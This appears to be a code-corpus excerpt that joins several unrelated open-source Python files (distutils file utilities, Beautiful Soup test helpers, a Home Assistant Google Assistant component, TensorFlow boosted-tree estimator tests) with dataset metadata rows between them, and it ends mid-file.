if self.has_tags(item.tags, self.tags):
avase = self.serialize_obj(item, AZURE_OBJECT_CLASS)
avase['name'] = item.name
avase['type'] = item.type
avase['sku'] = item.sku.name
results.append(avase)
return results
def main():
"""Main module execution code path"""
AzureRMAvailabilitySetFacts()
if __name__ == '__main__':
main()
| gpl-3.0 | 5,869,415,297,240,903,000 | 25.410405 | 92 | 0.594003 | false |
jagguli/intellij-community | python/lib/Lib/distutils/file_util.py | 81 | 8341 | """distutils.file_util
Utility functions for operating on single files.
"""
# This module should be kept compatible with Python 2.1.
__revision__ = "$Id: file_util.py 37828 2004-11-10 22:23:15Z loewis $"
import os
from distutils.errors import DistutilsFileError
from distutils import log
# for generating verbose output in 'copy_file()'
_copy_action = { None: 'copying',
'hard': 'hard linking',
'sym': 'symbolically linking' }
def _copy_file_contents (src, dst, buffer_size=16*1024):
"""Copy the file 'src' to 'dst'; both must be filenames. Any error
opening either file, reading from 'src', or writing to 'dst', raises
DistutilsFileError. Data is read/written in chunks of 'buffer_size'
bytes (default 16k). No attempt is made to handle anything apart from
regular files.
"""
# Stolen from shutil module in the standard library, but with
# custom error-handling added.
fsrc = None
fdst = None
try:
try:
fsrc = open(src, 'rb')
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not open '%s': %s" % (src, errstr)
if os.path.exists(dst):
try:
os.unlink(dst)
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not delete '%s': %s" % (dst, errstr)
try:
fdst = open(dst, 'wb')
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not create '%s': %s" % (dst, errstr)
while 1:
try:
buf = fsrc.read(buffer_size)
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not read from '%s': %s" % (src, errstr)
if not buf:
break
try:
fdst.write(buf)
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not write to '%s': %s" % (dst, errstr)
finally:
if fdst:
fdst.close()
if fsrc:
fsrc.close()
# _copy_file_contents()
def copy_file (src, dst,
preserve_mode=1,
preserve_times=1,
update=0,
link=None,
verbose=0,
dry_run=0):
"""Copy a file 'src' to 'dst'. If 'dst' is a directory, then 'src' is
copied there with the same name; otherwise, it must be a filename. (If
the file exists, it will be ruthlessly clobbered.) If 'preserve_mode'
is true (the default), the file's mode (type and permission bits, or
whatever is analogous on the current platform) is copied. If
'preserve_times' is true (the default), the last-modified and
last-access times are copied as well. If 'update' is true, 'src' will
only be copied if 'dst' does not exist, or if 'dst' does exist but is
older than 'src'.
'link' allows you to make hard links (os.link) or symbolic links
(os.symlink) instead of copying: set it to "hard" or "sym"; if it is
None (the default), files are copied. Don't set 'link' on systems that
don't support it: 'copy_file()' doesn't check if hard or symbolic
linking is available.
Under Mac OS, uses the native file copy function in macostools; on
other systems, uses '_copy_file_contents()' to copy file contents.
Return a tuple (dest_name, copied): 'dest_name' is the actual name of
the output file, and 'copied' is true if the file was copied (or would
have been copied, if 'dry_run' true).
"""
# XXX if the destination file already exists, we clobber it if
# copying, but blow up if linking. Hmmm. And I don't know what
# macostools.copyfile() does. Should definitely be consistent, and
# should probably blow up if destination exists and we would be
# changing it (ie. it's not already a hard/soft link to src OR
# (not update) and (src newer than dst).
from distutils.dep_util import newer
from stat import ST_ATIME, ST_MTIME, ST_MODE, S_IMODE
if not os.path.isfile(src):
raise DistutilsFileError, \
"can't copy '%s': doesn't exist or not a regular file" % src
if os.path.isdir(dst):
dir = dst
dst = os.path.join(dst, os.path.basename(src))
else:
dir = os.path.dirname(dst)
if update and not newer(src, dst):
log.debug("not copying %s (output up-to-date)", src)
return dst, 0
try:
action = _copy_action[link]
except KeyError:
raise ValueError, \
"invalid value '%s' for 'link' argument" % link
if os.path.basename(dst) == os.path.basename(src):
log.info("%s %s -> %s", action, src, dir)
else:
log.info("%s %s -> %s", action, src, dst)
if dry_run:
return (dst, 1)
# On Mac OS, use the native file copy routine
if os.name == 'mac':
import macostools
try:
macostools.copy(src, dst, 0, preserve_times)
except os.error, exc:
raise DistutilsFileError, \
"could not copy '%s' to '%s': %s" % (src, dst, exc[-1])
# If linking (hard or symbolic), use the appropriate system call
# (Unix only, of course, but that's the caller's responsibility)
elif link == 'hard':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.link(src, dst)
elif link == 'sym':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.symlink(src, dst)
# Otherwise (non-Mac, not linking), copy the file contents and
# (optionally) copy the times and mode.
else:
_copy_file_contents(src, dst)
if preserve_mode or preserve_times:
st = os.stat(src)
# According to David Ascher <[email protected]>, utime() should be done
# before chmod() (at least under NT).
if preserve_times:
os.utime(dst, (st[ST_ATIME], st[ST_MTIME]))
if preserve_mode and hasattr(os, 'chmod'):
os.chmod(dst, S_IMODE(st[ST_MODE]))
return (dst, 1)
# copy_file ()
# XXX I suspect this is Unix-specific -- need porting help!
def move_file (src, dst,
verbose=0,
dry_run=0):
"""Move a file 'src' to 'dst'. If 'dst' is a directory, the file will
be moved into it with the same name; otherwise, 'src' is just renamed
to 'dst'. Return the new full name of the file.
Handles cross-device moves on Unix using 'copy_file()'. What about
other systems???
"""
from os.path import exists, isfile, isdir, basename, dirname
import errno
log.info("moving %s -> %s", src, dst)
if dry_run:
return dst
if not isfile(src):
raise DistutilsFileError, \
"can't move '%s': not a regular file" % src
if isdir(dst):
dst = os.path.join(dst, basename(src))
elif exists(dst):
raise DistutilsFileError, \
"can't move '%s': destination '%s' already exists" % \
(src, dst)
if not isdir(dirname(dst)):
raise DistutilsFileError, \
"can't move '%s': destination '%s' not a valid path" % \
(src, dst)
copy_it = 0
try:
os.rename(src, dst)
except os.error, (num, msg):
if num == errno.EXDEV:
copy_it = 1
else:
raise DistutilsFileError, \
"couldn't move '%s' to '%s': %s" % (src, dst, msg)
if copy_it:
copy_file(src, dst)
try:
os.unlink(src)
except os.error, (num, msg):
try:
os.unlink(dst)
except os.error:
pass
raise DistutilsFileError, \
("couldn't move '%s' to '%s' by copy/delete: " +
"delete '%s' failed: %s") % \
(src, dst, src, msg)
return dst
# move_file ()
def write_file (filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
f = open(filename, "w")
for line in contents:
f.write(line + "\n")
f.close()
| apache-2.0 | -6,619,488,077,227,218,000 | 31.968379 | 76 | 0.56492 | false |
dya2/python-for-android | python3-alpha/extra_modules/bs4/testing.py | 46 | 18683 | """Helper classes for tests."""
import copy
import functools
import unittest
from unittest import TestCase
from bs4 import BeautifulSoup
from bs4.element import (
Comment,
Doctype,
SoupStrainer,
)
from bs4.builder import HTMLParserTreeBuilder
default_builder = HTMLParserTreeBuilder
class SoupTest(unittest.TestCase):
@property
def default_builder(self):
return default_builder()
def soup(self, markup, **kwargs):
"""Build a Beautiful Soup object from markup."""
builder = kwargs.pop('builder', self.default_builder)
return BeautifulSoup(markup, builder=builder, **kwargs)
def document_for(self, markup):
"""Turn an HTML fragment into a document.
The details depend on the builder.
"""
return self.default_builder.test_fragment_to_document(markup)
def assertSoupEquals(self, to_parse, compare_parsed_to=None):
builder = self.default_builder
obj = BeautifulSoup(to_parse, builder=builder)
if compare_parsed_to is None:
compare_parsed_to = to_parse
self.assertEqual(obj.decode(), self.document_for(compare_parsed_to))
class HTMLTreeBuilderSmokeTest(object):
"""A basic test of a treebuilder's competence.
Any HTML treebuilder, present or future, should be able to pass
these tests. With invalid markup, there's room for interpretation,
and different parsers can handle it differently. But with the
markup in these tests, there's not much room for interpretation.
"""
def assertDoctypeHandled(self, doctype_fragment):
"""Assert that a given doctype string is handled correctly."""
doctype_str, soup = self._document_with_doctype(doctype_fragment)
# Make sure a Doctype object was created.
doctype = soup.contents[0]
self.assertEqual(doctype.__class__, Doctype)
self.assertEqual(doctype, doctype_fragment)
self.assertEqual(str(soup)[:len(doctype_str)], doctype_str)
# Make sure that the doctype was correctly associated with the
# parse tree and that the rest of the document parsed.
self.assertEqual(soup.p.contents[0], 'foo')
def _document_with_doctype(self, doctype_fragment):
"""Generate and parse a document with the given doctype."""
doctype = '<!DOCTYPE %s>' % doctype_fragment
markup = doctype + '\n<p>foo</p>'
soup = self.soup(markup)
return doctype, soup
def test_normal_doctypes(self):
"""Make sure normal, everyday HTML doctypes are handled correctly."""
self.assertDoctypeHandled("html")
self.assertDoctypeHandled(
'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"')
def test_public_doctype_with_url(self):
doctype = 'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"'
self.assertDoctypeHandled(doctype)
def test_system_doctype(self):
self.assertDoctypeHandled('foo SYSTEM "http://www.example.com/"')
def test_namespaced_system_doctype(self):
# We can handle a namespaced doctype with a system ID.
self.assertDoctypeHandled('xsl:stylesheet SYSTEM "htmlent.dtd"')
def test_namespaced_public_doctype(self):
# Test a namespaced doctype with a public id.
self.assertDoctypeHandled('xsl:stylesheet PUBLIC "htmlent.dtd"')
def test_deepcopy(self):
"""Make sure you can copy the tree builder.
This is important because the builder is part of a
BeautifulSoup object, and we want to be able to copy that.
"""
copy.deepcopy(self.default_builder)
def test_p_tag_is_never_empty_element(self):
"""A <p> tag is never designated as an empty-element tag.
Even if the markup shows it as an empty-element tag, it
shouldn't be presented that way.
"""
soup = self.soup("<p/>")
self.assertFalse(soup.p.is_empty_element)
self.assertEqual(str(soup.p), "<p></p>")
def test_unclosed_tags_get_closed(self):
"""A tag that's not closed by the end of the document should be closed.
This applies to all tags except empty-element tags.
"""
self.assertSoupEquals("<p>", "<p></p>")
self.assertSoupEquals("<b>", "<b></b>")
self.assertSoupEquals("<br>", "<br/>")
def test_br_is_always_empty_element_tag(self):
"""A <br> tag is designated as an empty-element tag.
Some parsers treat <br></br> as one <br/> tag, some parsers as
two tags, but it should always be an empty-element tag.
"""
soup = self.soup("<br></br>")
self.assertTrue(soup.br.is_empty_element)
self.assertEqual(str(soup.br), "<br/>")
def test_nested_formatting_elements(self):
self.assertSoupEquals("<em><em></em></em>")
def test_comment(self):
# Comments are represented as Comment objects.
markup = "<p>foo<!--foobar-->baz</p>"
self.assertSoupEquals(markup)
soup = self.soup(markup)
comment = soup.find(text="foobar")
self.assertEqual(comment.__class__, Comment)
def test_preserved_whitespace_in_pre_and_textarea(self):
"""Whitespace must be preserved in <pre> and <textarea> tags."""
self.assertSoupEquals("<pre> </pre>")
self.assertSoupEquals("<textarea> woo </textarea>")
def test_nested_inline_elements(self):
"""Inline elements can be nested indefinitely."""
b_tag = "<b>Inside a B tag</b>"
self.assertSoupEquals(b_tag)
nested_b_tag = "<p>A <i>nested <b>tag</b></i></p>"
self.assertSoupEquals(nested_b_tag)
double_nested_b_tag = "<p>A <a>doubly <i>nested <b>tag</b></i></a></p>"
self.assertSoupEquals(nested_b_tag)
def test_nested_block_level_elements(self):
"""Block elements can be nested."""
soup = self.soup('<blockquote><p><b>Foo</b></p></blockquote>')
blockquote = soup.blockquote
self.assertEqual(blockquote.p.b.string, 'Foo')
self.assertEqual(blockquote.b.string, 'Foo')
def test_correctly_nested_tables(self):
"""One table can go inside another one."""
markup = ('<table id="1">'
'<tr>'
"<td>Here's another table:"
'<table id="2">'
'<tr><td>foo</td></tr>'
'</table></td>')
self.assertSoupEquals(
markup,
'<table id="1"><tr><td>Here\'s another table:'
'<table id="2"><tr><td>foo</td></tr></table>'
'</td></tr></table>')
self.assertSoupEquals(
"<table><thead><tr><td>Foo</td></tr></thead>"
"<tbody><tr><td>Bar</td></tr></tbody>"
"<tfoot><tr><td>Baz</td></tr></tfoot></table>")
def test_angle_brackets_in_attribute_values_are_escaped(self):
self.assertSoupEquals('<a b="<a>"></a>', '<a b="<a>"></a>')
def test_entities_in_attributes_converted_to_unicode(self):
expect = '<p id="pi\N{LATIN SMALL LETTER N WITH TILDE}ata"></p>'
self.assertSoupEquals('<p id="piñata"></p>', expect)
self.assertSoupEquals('<p id="piñata"></p>', expect)
self.assertSoupEquals('<p id="piñata"></p>', expect)
def test_entities_in_text_converted_to_unicode(self):
expect = '<p>pi\N{LATIN SMALL LETTER N WITH TILDE}ata</p>'
self.assertSoupEquals("<p>piñata</p>", expect)
self.assertSoupEquals("<p>piñata</p>", expect)
self.assertSoupEquals("<p>piñata</p>", expect)
def test_out_of_range_entity(self):
expect = "\N{REPLACEMENT CHARACTER}"
self.assertSoupEquals("�", expect)
self.assertSoupEquals("�", expect)
self.assertSoupEquals("�", expect)
def test_basic_namespaces(self):
"""Parsers don't need to *understand* namespaces, but at the
very least they should not choke on namespaces or lose
data."""
markup = b'<html xmlns="http://www.w3.org/1999/xhtml" xmlns:mathml="http://www.w3.org/1998/Math/MathML" xmlns:svg="http://www.w3.org/2000/svg"><head></head><body><mathml:msqrt>4</mathml:msqrt><b svg:fill="red"></b></body></html>'
soup = self.soup(markup)
self.assertEqual(markup, soup.encode())
html = soup.html
self.assertEqual('http://www.w3.org/1999/xhtml', soup.html['xmlns'])
self.assertEqual(
'http://www.w3.org/1998/Math/MathML', soup.html['xmlns:mathml'])
self.assertEqual(
'http://www.w3.org/2000/svg', soup.html['xmlns:svg'])
#
# Generally speaking, tests below this point are more tests of
# Beautiful Soup than tests of the tree builders. But parsers are
# weird, so we run these tests separately for every tree builder
# to detect any differences between them.
#
def test_soupstrainer(self):
"""Parsers should be able to work with SoupStrainers."""
strainer = SoupStrainer("b")
soup = self.soup("A <b>bold</b> <meta/> <i>statement</i>",
parse_only=strainer)
self.assertEqual(soup.decode(), "<b>bold</b>")
def test_single_quote_attribute_values_become_double_quotes(self):
self.assertSoupEquals("<foo attr='bar'></foo>",
'<foo attr="bar"></foo>')
def test_attribute_values_with_nested_quotes_are_left_alone(self):
text = """<foo attr='bar "brawls" happen'>a</foo>"""
self.assertSoupEquals(text)
def test_attribute_values_with_double_nested_quotes_get_quoted(self):
text = """<foo attr='bar "brawls" happen'>a</foo>"""
soup = self.soup(text)
soup.foo['attr'] = 'Brawls happen at "Bob\'s Bar"'
self.assertSoupEquals(
soup.foo.decode(),
"""<foo attr="Brawls happen at "Bob\'s Bar"">a</foo>""")
def test_ampersand_in_attribute_value_gets_escaped(self):
self.assertSoupEquals('<this is="really messed up & stuff"></this>',
'<this is="really messed up & stuff"></this>')
self.assertSoupEquals(
'<a href="http://example.org?a=1&b=2;3">foo</a>',
'<a href="http://example.org?a=1&b=2;3">foo</a>')
def test_escaped_ampersand_in_attribute_value_is_left_alone(self):
self.assertSoupEquals('<a href="http://example.org?a=1&b=2;3"></a>')
def test_entities_in_strings_converted_during_parsing(self):
# Both XML and HTML entities are converted to Unicode characters
# during parsing.
text = "<p><<sacré bleu!>></p>"
expected = "<p><<sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!>></p>"
self.assertSoupEquals(text, expected)
def test_smart_quotes_converted_on_the_way_in(self):
# Microsoft smart quotes are converted to Unicode characters during
# parsing.
quote = b"<p>\x91Foo\x92</p>"
soup = self.soup(quote)
self.assertEqual(
soup.p.string,
"\N{LEFT SINGLE QUOTATION MARK}Foo\N{RIGHT SINGLE QUOTATION MARK}")
def test_non_breaking_spaces_converted_on_the_way_in(self):
soup = self.soup("<a> </a>")
self.assertEqual(soup.a.string, "\N{NO-BREAK SPACE}" * 2)
def test_entities_converted_on_the_way_out(self):
text = "<p><<sacré bleu!>></p>"
expected = "<p><<sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!>></p>".encode("utf-8")
soup = self.soup(text)
self.assertEqual(soup.p.encode("utf-8"), expected)
def test_real_iso_latin_document(self):
# Smoke test of interrelated functionality, using an
# easy-to-understand document.
# Here it is in Unicode. Note that it claims to be in ISO-Latin-1.
unicode_html = '<html><head><meta content="text/html; charset=ISO-Latin-1" http-equiv="Content-type"/></head><body><p>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</p></body></html>'
# That's because we're going to encode it into ISO-Latin-1, and use
# that to test.
iso_latin_html = unicode_html.encode("iso-8859-1")
# Parse the ISO-Latin-1 HTML.
soup = self.soup(iso_latin_html)
# Encode it to UTF-8.
result = soup.encode("utf-8")
# What do we expect the result to look like? Well, it would
# look like unicode_html, except that the META tag would say
# UTF-8 instead of ISO-Latin-1.
expected = unicode_html.replace("ISO-Latin-1", "utf-8")
# And, of course, it would be in UTF-8, not Unicode.
expected = expected.encode("utf-8")
# Ta-da!
self.assertEqual(result, expected)
def test_real_shift_jis_document(self):
# Smoke test to make sure the parser can handle a document in
# Shift-JIS encoding, without choking.
shift_jis_html = (
b'<html><head></head><body><pre>'
b'\x82\xb1\x82\xea\x82\xcdShift-JIS\x82\xc5\x83R\x81[\x83f'
b'\x83B\x83\x93\x83O\x82\xb3\x82\xea\x82\xbd\x93\xfa\x96{\x8c'
b'\xea\x82\xcc\x83t\x83@\x83C\x83\x8b\x82\xc5\x82\xb7\x81B'
b'</pre></body></html>')
unicode_html = shift_jis_html.decode("shift-jis")
soup = self.soup(unicode_html)
# Make sure the parse tree is correctly encoded to various
# encodings.
self.assertEqual(soup.encode("utf-8"), unicode_html.encode("utf-8"))
self.assertEqual(soup.encode("euc_jp"), unicode_html.encode("euc_jp"))
def test_real_hebrew_document(self):
# A real-world test to make sure we can convert ISO-8859-9 (a
# Hebrew encoding) to UTF-8.
hebrew_document = b'<html><head><title>Hebrew (ISO 8859-8) in Visual Directionality</title></head><body><h1>Hebrew (ISO 8859-8) in Visual Directionality</h1>\xed\xe5\xec\xf9</body></html>'
soup = self.soup(
hebrew_document, from_encoding="iso8859-8")
self.assertEqual(soup.original_encoding, 'iso8859-8')
self.assertEqual(
soup.encode('utf-8'),
hebrew_document.decode("iso8859-8").encode("utf-8"))
def test_meta_tag_reflects_current_encoding(self):
# Here's the <meta> tag saying that a document is
# encoded in Shift-JIS.
meta_tag = ('<meta content="text/html; charset=x-sjis" '
'http-equiv="Content-type"/>')
# Here's a document incorporating that meta tag.
shift_jis_html = (
'<html><head>\n%s\n'
'<meta http-equiv="Content-language" content="ja"/>'
'</head><body>Shift-JIS markup goes here.') % meta_tag
soup = self.soup(shift_jis_html)
# Parse the document, and the charset is replaced with a
# generic value.
parsed_meta = soup.find('meta', {'http-equiv': 'Content-type'})
self.assertEqual(parsed_meta['content'],
'text/html; charset=%SOUP-ENCODING%')
self.assertEqual(parsed_meta.contains_substitutions, True)
# For the rest of the story, see TestSubstitutions in
# test_tree.py.
def test_html5_style_meta_tag_reflects_current_encoding(self):
# Here's the <meta> tag saying that a document is
# encoded in Shift-JIS.
meta_tag = ('<meta id="encoding" charset="x-sjis" />')
# Here's a document incorporating that meta tag.
shift_jis_html = (
'<html><head>\n%s\n'
'<meta http-equiv="Content-language" content="ja"/>'
'</head><body>Shift-JIS markup goes here.') % meta_tag
soup = self.soup(shift_jis_html)
# Parse the document, and the charset is replaced with a
# generic value.
parsed_meta = soup.find('meta', id="encoding")
self.assertEqual('%SOUP-ENCODING%', parsed_meta['charset'])
self.assertEqual(True, parsed_meta.contains_substitutions)
class XMLTreeBuilderSmokeTest(object):
def test_docstring_generated(self):
soup = self.soup("<root/>")
self.assertEqual(
soup.encode(), b'<?xml version="1.0" encoding="utf-8"?>\n<root/>')
def test_docstring_includes_correct_encoding(self):
soup = self.soup("<root/>")
self.assertEqual(
soup.encode("latin1"),
b'<?xml version="1.0" encoding="latin1"?>\n<root/>')
def test_real_xhtml_document(self):
"""A real XHTML document should come out the same as it went in."""
markup = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Hello.</title></head>
<body>Goodbye.</body>
</html>"""
soup = self.soup(markup)
self.assertEqual(soup.encode("utf-8"), markup)
def test_tags_are_empty_element_if_and_only_if_they_are_empty(self):
self.assertSoupEquals("<p>", "<p/>")
self.assertSoupEquals("<p>foo</p>")
def test_namespaces_are_preserved(self):
markup = '<root xmlns:a="http://example.com/" xmlns:b="http://example.net/"><a:foo>This tag is in the a namespace</a:foo><b:foo>This tag is in the b namespace</b:foo></root>'
soup = self.soup(markup)
root = soup.root
self.assertEqual("http://example.com/", root['xmlns:a'])
self.assertEqual("http://example.net/", root['xmlns:b'])
class HTML5TreeBuilderSmokeTest(HTMLTreeBuilderSmokeTest):
"""Smoke test for a tree builder that supports HTML5."""
def test_html_tags_have_namespace(self):
markup = "<a>"
soup = self.soup(markup)
self.assertEqual("http://www.w3.org/1999/xhtml", soup.a.namespace)
def test_svg_tags_have_namespace(self):
markup = '<svg><circle/></svg>'
soup = self.soup(markup)
namespace = "http://www.w3.org/2000/svg"
self.assertEqual(namespace, soup.svg.namespace)
self.assertEqual(namespace, soup.circle.namespace)
def test_mathml_tags_have_namespace(self):
markup = '<math><msqrt>5</msqrt></math>'
soup = self.soup(markup)
namespace = 'http://www.w3.org/1998/Math/MathML'
self.assertEqual(namespace, soup.math.namespace)
self.assertEqual(namespace, soup.msqrt.namespace)
def skipIf(condition, reason):
def nothing(test, *args, **kwargs):
return None
def decorator(test_item):
if condition:
return nothing
else:
return test_item
return decorator
| apache-2.0 | 7,447,682,666,164,341,000 | 39.615217 | 237 | 0.614409 | false |
partofthething/home-assistant | homeassistant/components/google_assistant/__init__.py | 2 | 3785 | """Support for Actions on Google Assistant Smart Home Control."""
import logging
from typing import Any, Dict
import voluptuous as vol
# Typing imports
from homeassistant.const import CONF_API_KEY, CONF_NAME
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.helpers import config_validation as cv
from .const import (
CONF_ALIASES,
CONF_CLIENT_EMAIL,
CONF_ENTITY_CONFIG,
CONF_EXPOSE,
CONF_EXPOSE_BY_DEFAULT,
CONF_EXPOSED_DOMAINS,
CONF_PRIVATE_KEY,
CONF_PROJECT_ID,
CONF_REPORT_STATE,
CONF_ROOM_HINT,
CONF_SECURE_DEVICES_PIN,
CONF_SERVICE_ACCOUNT,
DEFAULT_EXPOSE_BY_DEFAULT,
DEFAULT_EXPOSED_DOMAINS,
DOMAIN,
SERVICE_REQUEST_SYNC,
)
from .const import EVENT_QUERY_RECEIVED # noqa: F401
from .http import GoogleAssistantView, GoogleConfig
from .const import EVENT_COMMAND_RECEIVED, EVENT_SYNC_RECEIVED # noqa: F401, isort:skip
_LOGGER = logging.getLogger(__name__)
CONF_ALLOW_UNLOCK = "allow_unlock"
ENTITY_SCHEMA = vol.Schema(
{
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_EXPOSE, default=True): cv.boolean,
vol.Optional(CONF_ALIASES): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_ROOM_HINT): cv.string,
}
)
GOOGLE_SERVICE_ACCOUNT = vol.Schema(
{
vol.Required(CONF_PRIVATE_KEY): cv.string,
vol.Required(CONF_CLIENT_EMAIL): cv.string,
},
extra=vol.ALLOW_EXTRA,
)
def _check_report_state(data):
if data[CONF_REPORT_STATE] and CONF_SERVICE_ACCOUNT not in data:
raise vol.Invalid("If report state is enabled, a service account must exist")
return data
GOOGLE_ASSISTANT_SCHEMA = vol.All(
vol.Schema(
{
vol.Required(CONF_PROJECT_ID): cv.string,
vol.Optional(
CONF_EXPOSE_BY_DEFAULT, default=DEFAULT_EXPOSE_BY_DEFAULT
): cv.boolean,
vol.Optional(
CONF_EXPOSED_DOMAINS, default=DEFAULT_EXPOSED_DOMAINS
): cv.ensure_list,
vol.Optional(CONF_ENTITY_CONFIG): {cv.entity_id: ENTITY_SCHEMA},
# str on purpose, makes sure it is configured correctly.
vol.Optional(CONF_SECURE_DEVICES_PIN): str,
vol.Optional(CONF_REPORT_STATE, default=False): cv.boolean,
vol.Optional(CONF_SERVICE_ACCOUNT): GOOGLE_SERVICE_ACCOUNT,
# deprecated configuration options
vol.Remove(CONF_ALLOW_UNLOCK): cv.boolean,
vol.Remove(CONF_API_KEY): cv.string,
},
extra=vol.PREVENT_EXTRA,
),
_check_report_state,
)
CONFIG_SCHEMA = vol.Schema({DOMAIN: GOOGLE_ASSISTANT_SCHEMA}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass: HomeAssistant, yaml_config: Dict[str, Any]):
"""Activate Google Actions component."""
config = yaml_config.get(DOMAIN, {})
google_config = GoogleConfig(hass, config)
await google_config.async_initialize()
hass.http.register_view(GoogleAssistantView(google_config))
if google_config.should_report_state:
google_config.async_enable_report_state()
async def request_sync_service_handler(call: ServiceCall):
"""Handle request sync service calls."""
agent_user_id = call.data.get("agent_user_id") or call.context.user_id
if agent_user_id is None:
_LOGGER.warning(
"No agent_user_id supplied for request_sync. Call as a user or pass in user id as agent_user_id"
)
return
await google_config.async_sync_entities(agent_user_id)
# Register service only if key is provided
if CONF_SERVICE_ACCOUNT in config:
hass.services.async_register(
DOMAIN, SERVICE_REQUEST_SYNC, request_sync_service_handler
)
return True
| mit | -3,595,111,798,618,168,300 | 30.541667 | 112 | 0.662351 | false |
jendap/tensorflow | tensorflow/contrib/boosted_trees/estimator_batch/dnn_tree_combined_estimator_test.py | 20 | 9393 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for combined DNN + GBDT estimators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
from tensorflow.contrib.boosted_trees.estimator_batch import dnn_tree_combined_estimator as estimator
from tensorflow.contrib.boosted_trees.proto import learner_pb2
from tensorflow.contrib.layers.python.layers import feature_column
from tensorflow.contrib.learn.python.learn.estimators import estimator_test_utils
from tensorflow.contrib.learn.python.learn.estimators import run_config
from tensorflow.python.estimator import exporter
from tensorflow.python.estimator.canned import head as head_lib
from tensorflow.python.estimator.export import export
from tensorflow.python.ops import parsing_ops
from tensorflow.python.feature_column import feature_column_lib as core_feature_column
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import googletest
from tensorflow.python.training import checkpoint_utils
def _train_input_fn():
features = {
"x": constant_op.constant([[2.], [1.], [1.]])
}
label = constant_op.constant([[1], [0], [0]], dtype=dtypes.int32)
return features, label
def _eval_input_fn():
features = {
"x": constant_op.constant([[1.], [2.], [2.]])
}
label = constant_op.constant([[0], [1], [1]], dtype=dtypes.int32)
return features, label
class DNNBoostedTreeCombinedTest(test_util.TensorFlowTestCase):
def testClassifierContract(self):
estimator_test_utils.assert_estimator_contract(
self, estimator.DNNBoostedTreeCombinedClassifier)
def testRegressorContract(self):
estimator_test_utils.assert_estimator_contract(
self, estimator.DNNBoostedTreeCombinedRegressor)
def testEstimatorContract(self):
estimator_test_utils.assert_estimator_contract(
self, estimator.DNNBoostedTreeCombinedEstimator)
def testNoDNNFeatureColumns(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
with self.assertRaisesRegexp(
ValueError,
"dnn_feature_columns must be specified"):
classifier = estimator.DNNBoostedTreeCombinedClassifier(
dnn_hidden_units=[1],
dnn_feature_columns=[],
tree_learner_config=learner_config,
num_trees=1,
tree_examples_per_layer=3,
n_classes=2)
classifier.fit(input_fn=_train_input_fn, steps=5)
def testFitAndEvaluateDontThrowException(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.DNNBoostedTreeCombinedClassifier(
dnn_hidden_units=[1],
dnn_feature_columns=[feature_column.real_valued_column("x")],
tree_learner_config=learner_config,
num_trees=1,
tree_examples_per_layer=3,
n_classes=2,
model_dir=model_dir,
config=config,
dnn_steps_to_train=10,
dnn_input_layer_to_tree=False,
tree_feature_columns=[feature_column.real_valued_column("x")])
classifier.fit(input_fn=_train_input_fn, steps=15)
classifier.evaluate(input_fn=_eval_input_fn, steps=1)
def testFitAndEvaluateWithDistillation(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.DNNBoostedTreeCombinedClassifier(
dnn_hidden_units=[1],
dnn_feature_columns=[feature_column.real_valued_column("x")],
tree_learner_config=learner_config,
num_trees=1,
tree_examples_per_layer=3,
n_classes=2,
model_dir=model_dir,
config=config,
dnn_steps_to_train=10,
dnn_input_layer_to_tree=False,
tree_feature_columns=[feature_column.real_valued_column("x")],
dnn_to_tree_distillation_param=(1, None))
classifier.fit(input_fn=_train_input_fn, steps=15)
classifier.evaluate(input_fn=_eval_input_fn, steps=1)
class CoreDNNBoostedTreeCombinedTest(test_util.TensorFlowTestCase):
def _assert_checkpoint(self, model_dir, global_step):
reader = checkpoint_utils.load_checkpoint(model_dir)
self.assertEqual(global_step, reader.get_tensor(ops.GraphKeys.GLOBAL_STEP))
def testTrainEvaluateInferDoesNotThrowErrorWithNoDnnInput(self):
head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 3
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
est = estimator.CoreDNNBoostedTreeCombinedEstimator(
head=head_fn,
dnn_hidden_units=[1],
dnn_feature_columns=[core_feature_column.numeric_column("x")],
tree_learner_config=learner_config,
